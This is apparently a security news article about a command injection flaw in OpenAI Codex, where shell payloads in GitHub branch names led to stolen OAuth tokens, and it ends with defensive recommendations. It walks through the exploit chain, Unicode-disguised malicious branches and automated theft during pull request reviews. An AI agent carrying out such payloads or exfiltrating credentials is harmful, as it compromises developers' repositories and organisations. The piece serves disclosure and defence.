The rapid adoption of AI coding assistants has introduced new and high-impact attack surfaces for modern development teams. A recent discovery by researchers at BeyondTrust highlights a critical command injection vulnerability in OpenAI Codex, capable of exposing sensitive GitHub access tokens and enabling full repository compromise.
What Is the OpenAI Codex Command Injection Vulnerability?
OpenAI Codex is a cloud-based AI development tool that integrates directly with GitHub repositories to automate tasks such as code generation, analysis, and pull request reviews.
Researchers discovered that Codex improperly handled user-controlled input, specifically the GitHub branch name parameter in HTTP POST requests. This input was passed directly into backend setup scripts without proper sanitization, creating a classic command injection vulnerability.
How the Exploit Works
Attackers can exploit this flaw using a maliciously crafted branch name:
- Inject a shell command payload into the branch name
- Codex executes the payload inside a managed container
- The payload extracts hidden GitHub OAuth tokens
- Tokens are written to an accessible file
- The attacker retrieves the file via Codex prompts
This results in full token exposure in plaintext.
Impact: Full GitHub Account and Repository Compromise
Once attackers obtain a valid token, they can:
- Access private repositories
- Modify source code
- Inject malicious commits
- Perform lateral movement across the organization
Because tokens inherit the exact permissions of the AI agent, the impact can escalate to organization-wide compromise.
Local Token Theft Across Windows, macOS, and Linux
The vulnerability extended beyond the cloud environment.
Researchers found that Codex desktop applications store authentication data locally. If an attacker gains access to a developer’s machine, they can extract local session tokens, authenticate directly to backend APIs, retrieve full task history, and extract hidden GitHub tokens from logs.
This enables silent, large-scale data exfiltration.
Advanced Attack Technique: Malicious Branch Injection
Attackers can scale the exploit using shared repositories by creating a malicious branch with an embedded payload. This payload can be disguised using Unicode characters and crafted to bypass GitHub naming restrictions.
To the victim, the branch appears identical to a legitimate one, such as the main branch.
Once accessed, the payload executes silently and sends the GitHub token to an attacker-controlled server.
Automated Exploitation via Pull Requests
The attack becomes more dangerous when combined with automation. When a developer triggers Codex for a code review, the system launches a container. If the repository contains the malicious branch, the payload executes automatically and allows attackers to steal GitHub Installation Access Tokens without direct interaction.
Affected Platforms
This critical vulnerability impacted:
- ChatGPT web interface
- Codex CLI
- Codex SDK
- Codex IDE extensions
The issue was responsibly disclosed in December 2025 and fully patched by January 2026.
Cybersecurity Best Practices to Prevent AI-Based Attacks
Organizations should adopt the following security measures:
Input Validation and Sanitization
Never pass unsanitized user input into shell commands.
Zero Trust for External Data
Treat all external provider inputs as untrusted.
Enforce Least Privilege
Limit permissions assigned to AI agents.
Repository Monitoring
Detect unusual branch names and flag Unicode obfuscation or shell metacharacters.
Token Security
Rotate GitHub tokens regularly and monitor API logs for suspicious activity.
Final Takeaway
The vulnerability in OpenAI Codex demonstrates a major shift in cybersecurity. AI-powered development tools are now high-value attack targets.
Organizations must treat AI containers, automation pipelines, and integrations as strict security boundaries, applying the same level of security controls used in traditional infrastructure.